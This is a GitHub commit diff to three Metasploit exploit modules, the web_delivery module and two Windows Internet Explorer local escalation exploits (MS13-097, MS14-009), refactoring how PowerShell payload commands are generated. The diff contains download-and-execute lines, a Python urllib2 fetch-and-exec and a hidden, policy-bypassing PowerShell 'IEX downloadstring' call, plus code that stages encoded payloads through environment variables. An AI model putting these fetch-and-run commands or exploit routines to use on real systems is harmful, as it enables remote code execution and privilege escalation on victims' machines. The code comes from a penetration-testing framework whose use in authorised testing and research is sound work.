Skip to content

Commit b0a596b

Browse files
committed
Update newer modules
1 parent 5f05336 commit b0a596b

File tree

3 files changed

+21
-3
lines changed

3 files changed

+21
-3
lines changed

modules/exploits/multi/script/web_delivery.rb

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -87,7 +87,11 @@ def primer
8787
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
8888
when "PSH_x86", "PSH_x64"
8989
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
90-
print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
90+
print_line generate_psh_command_line({
91+
:noprofile => true,
92+
:windowstyle => 'hidden',
93+
:command => download_and_run
94+
})
9195
end
9296
end
9397
end

modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb

Lines changed: 8 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -79,7 +79,14 @@ def exploit
7979
end
8080

8181
def primer
82-
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
82+
cmd = cmd_psh_payload(payload.encoded,
83+
payload_instance.arch.first,
84+
{
85+
:remove_comspec => true
86+
}
87+
)
88+
89+
cmd.gsub!('powershell.exe ','')
8390
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
8491

8592
html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"

modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

Lines changed: 8 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -148,7 +148,14 @@ def exploit
148148

149149
print_good(".NET looks vulnerable, exploiting...")
150150

151-
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
151+
cmd = cmd_psh_payload(payload.encoded,
152+
payload_instance.arch.first,
153+
{
154+
:remove_comspec => true
155+
}
156+
)
157+
158+
cmd.gsub!('powershell.exe ','')
152159
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
153160

154161
temp = get_env('TEMP')

0 commit comments

Comments
 (0)